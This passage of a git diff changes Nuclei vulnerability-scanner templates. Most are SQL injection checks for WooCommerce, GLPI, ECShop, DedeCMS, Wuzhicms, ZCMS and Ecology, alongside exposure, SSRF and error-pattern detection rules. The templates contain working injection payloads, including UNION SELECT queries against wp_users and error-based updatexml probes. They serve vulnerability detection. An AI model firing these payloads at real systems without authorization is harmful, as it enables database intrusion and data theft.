body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-wallet" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.4') \ No newline at end of file diff --git a/poc/sql/wordpress-db-repair-11255.yaml b/poc/sql/wordpress-db-repair-11255.yaml new file mode 100644 index 0000000000..5522479e9d --- /dev/null +++ b/poc/sql/wordpress-db-repair-11255.yaml @@ -0,0 +1,26 @@ +id: wordpress-db-repair +info: + name: Wordpress DB Repair Exposed + author: _C0wb0y_ + severity: low + description: Discover enabled Wordpress repair page. + tags: wordpress,config,fpd +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/maint/repair.php" + matchers-condition: and + matchers: + - type: word + words: + - "WordPress" + - type: status + status: + - 200 + - type: word + words: + - "define" + - "WP_ALLOW_REPAIR" + - "true" + condition: and + negative: true diff --git a/poc/sql/wordpress-woocommerce-sqli-11344.yaml b/poc/sql/wordpress-woocommerce-sqli-11344.yaml index 8a96cfe510..81d422c278 100644 --- a/poc/sql/wordpress-woocommerce-sqli-11344.yaml +++ b/poc/sql/wordpress-woocommerce-sqli-11344.yaml @@ -1,43 +1,28 @@ id: wordpress-woocommerce-sqli - info: - name: Woocommerce Unauthenticated SQL Injection + name: Unauthenticated SQL injection Woocommerce author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot severity: critical - description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability. - reference: + tags: wordpress,woocomernce,sqli,wp-plugin + reference: | - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx - - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-89 - tags: wordpress,woocommerce,sqli,wp-plugin,injection - requests: - method: GET path: - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' - matchers-condition: and matchers: - type: word words: - 'sqli-test' - 'attribute_counts' - - 'price_range' - - 'term' condition: and - - type: word words: - 'application/json' part: header - - type: status status: - 200 - -# Enhanced by mp on 2022/03/21 diff --git a/poc/sql/wpfavicon-b8d7827bcbedea7a40db5bb08217d076.yaml b/poc/sql/wpfavicon-b8d7827bcbedea7a40db5bb08217d076.yaml new file mode 100644 index 0000000000..ce6d9f7bdc --- /dev/null +++ b/poc/sql/wpfavicon-b8d7827bcbedea7a40db5bb08217d076.yaml @@ -0,0 +1,59 @@ +id: wpfavicon-b8d7827bcbedea7a40db5bb08217d076 + +info: + name: > + WPFavicon <= 2.1.1 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/22f98afa-eb14-4326-9971-49092c711249?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wpfavicon/" + google-query: inurl:"/wp-content/plugins/wpfavicon/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wpfavicon,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpfavicon/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpfavicon" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.1') \ No newline at end of file diff --git a/poc/sql/wuzhicms-sqli-11659.yaml b/poc/sql/wuzhicms-sqli-11659.yaml index 8d01741348..2fea61f35d 100644 --- a/poc/sql/wuzhicms-sqli-11659.yaml +++ b/poc/sql/wuzhicms-sqli-11659.yaml @@ -1,4 +1,5 @@ id: wuzhicms-sqli + info: name: Wuzhicms v4.1.0 SQL Injection author: princechaddha @@ -6,18 +7,19 @@ info: reference: - https://github.com/wuzhicms/wuzhicms/issues/184 tags: wuzhicms,sqli -variables: - num: "999999999" + requests: - method: GET path: - - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5({{num}})),0x7e),1)--%20" + - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20" matchers-condition: and matchers: - - type: word - words: - - '{{md5({{num}})}}' - part: body - type: status status: - 200 + - type: word + words: + - "81dc9bdb52d04dc20036dbd8313ed05" + - "sql_error:MySQL Query Error" + part: body + condition: and diff --git a/poc/sql/zcms-v3-sqli-11775.yaml b/poc/sql/zcms-v3-sqli-11775.yaml index a7084a23d3..61c4b5440d 100644 --- a/poc/sql/zcms-v3-sqli-11775.yaml +++ b/poc/sql/zcms-v3-sqli-11775.yaml @@ -1,4 +1,5 @@ id: zcms-v3-sqli + info: name: ZCMS SQL Injection author: princechaddha @@ -6,18 +7,17 @@ info: reference: - https://www.anquanke.com/post/id/183241 tags: zcms,sqli -variables: - num: "999999999" + requests: - method: GET path: - - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" + - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" matchers-condition: and matchers: - - type: word - words: - - '{{md5({{num}})}}' - part: body - type: status status: - 200 + - type: word + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + part: body diff --git a/poc/sql_injection/dedecms-membergroup-sqli-6796.yaml b/poc/sql_injection/dedecms-membergroup-sqli-6796.yaml index 603eb805a9..6ab43810d6 100644 --- a/poc/sql_injection/dedecms-membergroup-sqli-6796.yaml +++ b/poc/sql_injection/dedecms-membergroup-sqli-6796.yaml @@ -1,21 +1,27 @@ id: dedecms-membergroup-sqli + info: name: DedeCMS Membergroup SQLI author: pikpikcu severity: medium description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter. - reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html + reference: + - http://www.dedeyuan.com/xueyuan/wenti/1244.html tags: sqli,dedecms + requests: - method: GET path: - "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`" + matchers-condition: and matchers: + - type: word words: - "52c69e3a57331081823331c4e69d3f2e" part: body + - type: status status: - 200 diff --git a/poc/sql_injection/ecology-syncuserinfo-sqli-7177.yaml b/poc/sql_injection/ecology-syncuserinfo-sqli-7177.yaml index 77ccaabf31..ab5309607b 100644 --- a/poc/sql_injection/ecology-syncuserinfo-sqli-7177.yaml +++ b/poc/sql_injection/ecology-syncuserinfo-sqli-7177.yaml @@ -1,25 +1,39 @@ id: ecology-syncuserinfo-sqli + info: - name: Ecology Syncuserinfo Sqli + name: Ecology Syncuserinfo - SQL Injection author: ritikchaddha - severity: high + severity: critical + description: Ecology Syncuserinfo contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://www.weaver.com.cn/ + - https://github.com/chaitin/xray/blob/master/pocs/ecology-syncuserinfo-sqli.yml + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-89 metadata: + max-request: 1 fofa-query: app="泛微-协同办公OA" tags: ecology,sqli -requests: + +http: - method: GET path: - "{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null" - redirects: true + + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word part: body words: - "4386499557" + - type: status status: - 200 + +# digest: 4a0a0047304502207c7fdd7332a97f18ef506df96a746a9b815d76ae5c170f26537e3194eb09e907022100ad8b614f3075221e0152d3b945f6685ece46e871c092f46f7e01bec6a6be1dc4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/sql_injection/ecshop-sqli-7180.yaml b/poc/sql_injection/ecshop-sqli-7180.yaml index fbb70eb64c..47a60acc94 100644 --- a/poc/sql_injection/ecshop-sqli-7180.yaml +++ b/poc/sql_injection/ecshop-sqli-7180.yaml @@ -1,5 +1,4 @@ id: ecshop-sqli - info: name: ECShop 2.x/3.x SQL Injection author: Lark-lab,ImNightmaree,ritikchaddha @@ -15,7 +14,6 @@ info: verified: true fofa-query: app="ECShop" tags: sqli,php,ecshop - requests: - raw: - | @@ -23,13 +21,11 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;} - - | GET /user.php?act=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca - stop-at-first-match: true matchers-condition: or matchers: @@ -40,7 +36,6 @@ requests: - '[0] => Array' - 'MySQL server error report:Array' condition: and - - type: word words: - "PHP Extension" diff --git a/poc/sql_injection/error-based-sql-injection-7249.yaml b/poc/sql_injection/error-based-sql-injection-7249.yaml index f988118325..4cb4621ef2 100644 --- a/poc/sql_injection/error-based-sql-injection-7249.yaml +++ b/poc/sql_injection/error-based-sql-injection-7249.yaml @@ -1,14 +1,23 @@ id: error-based-sql-injection + info: name: Error based SQL injection author: geeknik - severity: high - description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml. - tags: sqli -requests: + severity: critical + description: A SQL injection vulnerability was identified based on an error message returned by the server. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-89 + metadata: + max-request: 1 + tags: sqli,generic,error + +http: - method: GET path: - "{{BaseURL}}/'" + matchers-condition: and matchers: - type: word @@ -17,6 +26,7 @@ requests: # False Positive part: body negative: true + - type: regex regex: # MySQL @@ -201,6 +211,7 @@ requests: - "Virtuoso S0002 Error" - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" condition: or + extractors: - type: regex name: MySQL @@ -217,20 +228,24 @@ requests: - "Pdo[./_\\\\]Mysql" - "MySqlException" - "SQLSTATE[\\d+]: Syntax error or access violation" + - type: regex name: MariaDB regex: - "check the manual that (corresponds to|fits) your MariaDB server version" + - type: regex name: Drizzel regex: - "check the manual that (corresponds to|fits) your Drizzle server version" + - type: regex name: MemSQL regex: - "MemSQL does not support this type of query" - "is not supported by MemSQL" - "unsupported nested scalar subselect" + - type: regex name: PostgreSQL regex: @@ -246,6 +261,7 @@ requests: - "org\\.postgresql\\.jdbc" - "Pdo[./_\\\\]Pgsql" - "PSQLException" + - type: regex name: MicrosoftSQLServer regex: @@ -268,6 +284,7 @@ requests: - "Pdo[./_\\\\](Mssql|SqlSrv)" - "SQL(Srv|Server)Exception" - "Unclosed quotation mark after the character string" + - type: regex name: MicrosoftAccess regex: @@ -276,6 +293,7 @@ requests: - "Access Database Engine" - "ODBC Microsoft Access" - "Syntax error \\(missing operator\\) in query expression" + - type: regex name: Oracle regex: @@ -290,6 +308,7 @@ requests: - "Zend_Db_(Adapter|Statement)_Oracle_Exception" - "Pdo[./_\\\\](Oracle|OCI)" - "OracleException" + - type: regex name: IBMDB2 regex: @@ -302,6 +321,7 @@ requests: - "Pdo[./_\\\\]Ibm" - "DB2Exception" - "ibm_db_dbi\\.ProgrammingError" + - type: regex name: Informix regex: @@ -313,6 +333,7 @@ requests: - "weblogic\\.jdbc\\.informix" - "Pdo[./_\\\\]Informix" - "IfxException" + - type: regex name: Firebird regex: @@ -320,6 +341,7 @@ requests: - "Warning.*?\\Wibase_" - "org\\.firebirdsql\\.jdbc" - "Pdo[./_\\\\]Firebird" + - type: regex name: SQLite regex: @@ -334,6 +356,7 @@ requests: - "org\\.sqlite\\.JDBC" - "Pdo[./_\\\\]Sqlite" - "SQLiteException" + - type: regex name: SAPMaxDB regex: @@ -343,6 +366,7 @@ requests: - "-3014.*?Invalid end of SQL statement" - "com\\.sap\\.dbtech\\.jdbc" - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + - type: regex name: Sybase regex: @@ -352,6 +376,7 @@ requests: - "SybSQLException" - "Sybase\\.Data\\.AseClient" - "com\\.sybase\\.jdbc" + - type: regex name: Ingres regex: @@ -359,6 +384,7 @@ requests: - "Ingres SQLSTATE" - "Ingres\\W.*?Driver" - "com\\.ingres\\.gcf\\.jdbc" + - type: regex name: FrontBase regex: @@ -366,29 +392,34 @@ requests: - "com\\.frontbase\\.jdbc" - "Syntax error 1. Missing" - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." + - type: regex name: HSQLDB regex: - "Unexpected end of command in statement \\[" - "Unexpected token.*?in statement \\[" - "org\\.hsqldb\\.jdbc" + - type: regex name: H2 regex: - "org\\.h2\\.jdbc" - "\\[42000-192\\]" + - type: regex name: MonetDB regex: - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" - "\\[MonetDB\\]\\[ODBC Driver" - "nl\\.cwi\\.monetdb\\.jdbc" + - type: regex name: ApacheDerby regex: - "Syntax error: Encountered" - "org\\.apache\\.derby" - "ERROR 42X01" + - type: regex name: Vertica regex: @@ -397,12 +428,14 @@ requests: - "com\\.vertica\\.jdbc" - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" - "com\\.vertica\\.dsi\\.dataengine" + - type: regex name: Mckoi regex: - "com\\.mckoi\\.JDBCDriver" - "com\\.mckoi\\.database\\.jdbc" - "<REGEX_LITERAL>" + - type: regex name: Presto regex: @@ -410,29 +443,35 @@ requests: - "io\\.prestosql\\.jdbc" - "com\\.simba\\.presto\\.jdbc" - "UNION query has different number of fields: \\d+, \\d+" + - type: regex name: Altibase regex: - "Altibase\\.jdbc\\.driver" + - type: regex name: MimerSQL regex: - "com\\.mimer\\.jdbc" - "Syntax error,[^\\n]+assumed to mean" + - type: regex name: CrateDB regex: - "io\\.crate\\.client\\.jdbc" + - type: regex name: Cache regex: - "encountered after end of query" - "A comparison operator is required here" + - type: regex name: RaimaDatabaseManager regex: - "-10048: Syntax error" - "rdmStmtPrepare\\(.+?\\) returned" + - type: regex name: Virtuoso regex: @@ -441,3 +480,4 @@ requests: - "SQ200: No table " - "Virtuoso S0002 Error" - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" +# digest: 4a0a0047304502202747aa1e6dea39e23e6100799bf4245c850a07895e151d189123dc27803dc2e5022100c8ebed9058d9d8dc5f249a93d40c1391ef22f5218d67cfa621679988285968dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/sql_injection/exposed-mysql-initial-7324.yaml b/poc/sql_injection/exposed-mysql-initial-7324.yaml index f644e79c49..3df4611d59 100644 --- a/poc/sql_injection/exposed-mysql-initial-7324.yaml +++ b/poc/sql_injection/exposed-mysql-initial-7324.yaml @@ -4,7 +4,8 @@ info: name: Exposed mysql.initial author: ELSFA7110 severity: info - reference: https://hackerone.com/reports/1081817 + reference: + - https://hackerone.com/reports/1081817 tags: config,exposure requests: diff --git a/poc/sql_injection/exposed-sqlite-manager-7350.yaml b/poc/sql_injection/exposed-sqlite-manager-7350.yaml index 6a86dc4ca9..cff80e3ad5 100644 --- a/poc/sql_injection/exposed-sqlite-manager-7350.yaml +++ b/poc/sql_injection/exposed-sqlite-manager-7350.yaml @@ -1,19 +1,15 @@ id: exposed-sqlite-manager - info: name: SQLiteManager author: dhiyaneshDK severity: medium - reference: - - https://www.exploit-db.com/ghdb/5003 + reference: https://www.exploit-db.com/ghdb/5003 tags: sqlite - requests: - method: GET path: - '{{BaseURL}}/sqlite/' - '{{BaseURL}}/sqlitemanager/' - matchers-condition: and matchers: - type: word diff --git a/poc/sql_injection/glpi-9.3.3-sql-injection(1).yaml b/poc/sql_injection/glpi-9.3.3-sql-injection(1).yaml index 98a2a439f1..e7c97f72d9 100644 --- a/poc/sql_injection/glpi-9.3.3-sql-injection(1).yaml +++ b/poc/sql_injection/glpi-9.3.3-sql-injection(1).yaml @@ -1,25 +1,30 @@ -id: GLPI_SQL_Injection -info: - author: RedTeamBrasil - description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." - name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" - reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" - severity: high - tags: "glpi,cve,sqli" -requests: - - matchers: - - part: body - type: word - words: - - "-MariaDB-" - max-redirects: 3 - method: GET - path: - - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" - redirects: true - extractors: - - type: regex - part: body - regex: - - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" +--- +id: GLPI_SQL_Injection + +info: + author: RedTeamBrasil + description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." + name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" + reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" + severity: high + tags: "glpi,cve,sqli" + +requests: + - + matchers: + - + part: body + type: word + words: + - "-MariaDB-" + max-redirects: 3 + method: GET + path: + - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + redirects: true + extractors: + - type: regex + part: body + regex: + - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" \ No newline at end of file diff --git a/poc/sql_injection/glpi-9.3.3-sql-injection.yaml b/poc/sql_injection/glpi-9.3.3-sql-injection.yaml new file mode 100644 index 0000000000..98a2a439f1 --- /dev/null +++ b/poc/sql_injection/glpi-9.3.3-sql-injection.yaml @@ -0,0 +1,25 @@ +id: GLPI_SQL_Injection +info: + author: RedTeamBrasil + description: "Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication." + name: "Pre-authenticated SQL injection in GLPI <= 9.3.3" + reference: "https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf" + severity: high + tags: "glpi,cve,sqli" +requests: + - matchers: + - part: body + type: word + words: + - "-MariaDB-" + max-redirects: 3 + method: GET + path: + - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1" + redirects: true + extractors: + - type: regex + part: body + regex: + - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB" diff --git a/poc/sql_injection/oracle-ebs-sqllog-disclosure-9369.yaml b/poc/sql_injection/oracle-ebs-sqllog-disclosure-9369.yaml index c3ced8553c..44c22c100b 100644 --- a/poc/sql_injection/oracle-ebs-sqllog-disclosure-9369.yaml +++ b/poc/sql_injection/oracle-ebs-sqllog-disclosure-9369.yaml @@ -1,15 +1,17 @@ id: oracle-ebs-sqllog-disclosure + info: name: Oracle EBS SQL Log Disclosure author: dhiyaneshDk severity: medium - reference: - - https://the-infosec.com/2017/03/29/do-you-know-what-your-erp-is-telling-us/ tags: oracle,ebs,logs,exposure + reference: https://the-infosec.com/2017/03/29/do-you-know-what-your-erp-is-telling-us/ + requests: - method: GET path: - '{{BaseURL}}/OA_HTML/bin/sqlnet.log' + matchers-condition: and matchers: - type: word @@ -17,10 +19,12 @@ requests: - "DESCRIPTION=" - "USER=" part: body + - type: word words: - "text/plain" part: header + - type: status status: - 200 diff --git a/poc/sql_injection/python-app-sql-exceptions-9744.yaml b/poc/sql_injection/python-app-sql-exceptions-9744.yaml index cf31580c01..43edeb6632 100644 --- a/poc/sql_injection/python-app-sql-exceptions-9744.yaml +++ b/poc/sql_injection/python-app-sql-exceptions-9744.yaml @@ -1,10 +1,11 @@ id: python-app-sql-exceptions info: name: Python App SQL Exception Check - description: Generic check for SQL exceptions in Python according to PEP 249 - reference: https://www.python.org/dev author: geeknik severity: medium + description: Generic check for SQL exceptions in Python according to PEP 249 + reference: + - https://www.python.org/dev tags: file,logs,python,sql file: - extensions: diff --git a/poc/sql_injection/simple-crm-sql-injection-10277.yaml b/poc/sql_injection/simple-crm-sql-injection-10277.yaml index 37cbb2fe5a..07c22d6f71 100644 --- a/poc/sql_injection/simple-crm-sql-injection-10277.yaml +++ b/poc/sql_injection/simple-crm-sql-injection-10277.yaml @@ -1,15 +1,9 @@ id: simple-crm-sql-injection info: - name: Simple CRM 3.0 SQL Injection and Authentication Bypass + name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass author: geeknik severity: high - description: Simple CRM 3.0 is susceptible to SQL injection and authentication bypass vulnerabilities. - reference: - - https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-89 + reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt tags: sqli,simplecrm,auth-bypass,injection requests: - method: POST @@ -29,5 +23,3 @@ requests: words: - "text/html" part: header - -# Enhanced by mp on 2022/03/30 diff --git a/poc/sql_injection/sql-server-reporting-10510.yaml b/poc/sql_injection/sql-server-reporting-10510.yaml index bb0fa2dd5b..4e97bee905 100644 --- a/poc/sql_injection/sql-server-reporting-10510.yaml +++ b/poc/sql_injection/sql-server-reporting-10510.yaml @@ -1,9 +1,11 @@ id: sql-server-reporting + info: name: Detect Microsoft SQL Server Reporting author: puzzlepeaches severity: info - tags: tech,micrsoft + tags: tech,microsoft + requests: - method: GET path: diff --git a/poc/sql_injection/wordpress-woocommerce-sqli-11344.yaml b/poc/sql_injection/wordpress-woocommerce-sqli-11344.yaml index 8a96cfe510..81d422c278 100644 --- a/poc/sql_injection/wordpress-woocommerce-sqli-11344.yaml +++ b/poc/sql_injection/wordpress-woocommerce-sqli-11344.yaml @@ -1,43 +1,28 @@ id: wordpress-woocommerce-sqli - info: - name: Woocommerce Unauthenticated SQL Injection + name: Unauthenticated SQL injection Woocommerce author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot severity: critical - description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability. - reference: + tags: wordpress,woocomernce,sqli,wp-plugin + reference: | - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx - - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-89 - tags: wordpress,woocommerce,sqli,wp-plugin,injection - requests: - method: GET path: - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' - matchers-condition: and matchers: - type: word words: - 'sqli-test' - 'attribute_counts' - - 'price_range' - - 'term' condition: and - - type: word words: - 'application/json' part: header - - type: status status: - 200 - -# Enhanced by mp on 2022/03/21 diff --git a/poc/sql_injection/wuzhicms-sqli-11659.yaml b/poc/sql_injection/wuzhicms-sqli-11659.yaml index 8d01741348..2fea61f35d 100644 --- a/poc/sql_injection/wuzhicms-sqli-11659.yaml +++ b/poc/sql_injection/wuzhicms-sqli-11659.yaml @@ -1,4 +1,5 @@ id: wuzhicms-sqli + info: name: Wuzhicms v4.1.0 SQL Injection author: princechaddha @@ -6,18 +7,19 @@ info: reference: - https://github.com/wuzhicms/wuzhicms/issues/184 tags: wuzhicms,sqli -variables: - num: "999999999" + requests: - method: GET path: - - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5({{num}})),0x7e),1)--%20" + - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20" matchers-condition: and matchers: - - type: word - words: - - '{{md5({{num}})}}' - part: body - type: status status: - 200 + - type: word + words: + - "81dc9bdb52d04dc20036dbd8313ed05" + - "sql_error:MySQL Query Error" + part: body + condition: and diff --git a/poc/sql_injection/zcms-v3-sqli-11775.yaml b/poc/sql_injection/zcms-v3-sqli-11775.yaml index a7084a23d3..61c4b5440d 100644 --- a/poc/sql_injection/zcms-v3-sqli-11775.yaml +++ b/poc/sql_injection/zcms-v3-sqli-11775.yaml @@ -1,4 +1,5 @@ id: zcms-v3-sqli + info: name: ZCMS SQL Injection author: princechaddha @@ -6,18 +7,17 @@ info: reference: - https://www.anquanke.com/post/id/183241 tags: zcms,sqli -variables: - num: "999999999" + requests: - method: GET path: - - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" + - "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'" matchers-condition: and matchers: - - type: word - words: - - '{{md5({{num}})}}' - part: body - type: status status: - 200 + - type: word + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + part: body diff --git a/poc/ssrf/ibm-websphere-ssrf-8126.yaml b/poc/ssrf/ibm-websphere-ssrf-8126.yaml index df664b9910..f936c2af24 100644 --- a/poc/ssrf/ibm-websphere-ssrf-8126.yaml +++ b/poc/ssrf/ibm-websphere-ssrf-8126.yaml @@ -3,8 +3,7 @@ info: name: IBM WebSphere Portal SSRF author: pdteam severity: high - reference: - - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ + reference: https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ tags: ibm,ssrf,websphere requests: - method: GET diff --git a/poc/ssrf/linkerd-ssrf-8643.yaml b/poc/ssrf/linkerd-ssrf-8643.yaml index b1b9aaf3a1..068fd47928 100644 --- a/poc/ssrf/linkerd-ssrf-8643.yaml +++ b/poc/ssrf/linkerd-ssrf-8643.yaml @@ -11,7 +11,7 @@ requests: path: - "{{BaseURL}}" headers: - l5d-dtab: /svc/* => /$/inet/example.com/443 + l5d-dtab: /svc/* 